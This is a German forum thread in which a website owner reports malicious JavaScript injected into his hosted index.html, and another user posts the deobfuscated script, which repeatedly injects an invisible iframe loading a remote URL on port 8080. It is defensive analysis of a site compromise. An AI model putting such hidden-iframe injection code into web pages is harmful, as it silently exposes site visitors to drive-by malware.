Javascript Schadcode auf Strato Webseite!

maddoccc

Lieutenant
Registriert
März 2009
Beiträge
562
Hi Leute,

seit einigen Tagen ist meine Webseite die auf einem Strato Server liegt abgeschalteten weil irgendjemand einen Schadcode in der index.html implementiert hat.

Den Schadcode habe ich nun entfernt und alle Passwörter geändert. Sollte also nicht wieder kommen.

Nun frage ich mich was dieser Javascript Schadcode auf den Computer anrichten kann weil ein paar Bekannte diesen unbewusst mit der Seite geöffnet hatten.

Den Code habe ich mal für die Profis unter euch in den Anhang getan. Sollte dies gegen einen Grundsatz des Boards verstoßen bitte ich den Anhang zu löschen. Dann versuche ich das Script in abgeänderter Form hier zu posten.

Gruß Maddoc
 

Anhänge

  • script.rar
    1 KB · Aufrufe: 159
nach etwas Suchen & Ersetzen und unnützen Code entfernen bleib nur mehr folgendes über:

PHP:
try {

	var vowel;

	function reach(){

	    clearInterval(vowel);

	    div = document["createElement"]("div");
	    div.id = 'div_1';
	    div.name = 'div_1';
	    document["body"]["appendChild"](div);

	    createElement = document["createElement"]("iframe");

		createElement.setAttribute("src","http://temp.rockwellentertainment.net:8080/index.php?pid=1");
		createElement.setAttribute("height",-1);
		createElement.setAttribute("width",-1);
		createElement.setAttribute("frameborder",0);

	    document.getElementById('div_1')["appendChild"](createElement);
	}

	vowel = window.setInterval(reach, '323');

}
catch(no) {
	alert(no)
}

Sieht so aus wurde versuch ein iframe einzubetten um den Inhalt einer anderen Seite zu laden ;)

Grüße
 
Komisch. Warum schlägt dann der Virenscanner an und bei einem Freund kam sogar ein Bluescreen?
 
Vermutlich liefert diese Seite irgendeinen Schadcode aus. Konnte hier unter MacOSX und Safari aber nicht besonderes feststellen - außer einen kryptischen HTTP-Header Eintrag der eventuell beim älteren IE Versionen Probleme verursacht.
 

Anhänge

  • header.jpg
    header.jpg
    126,5 KB · Aufrufe: 166
Zurück
Oben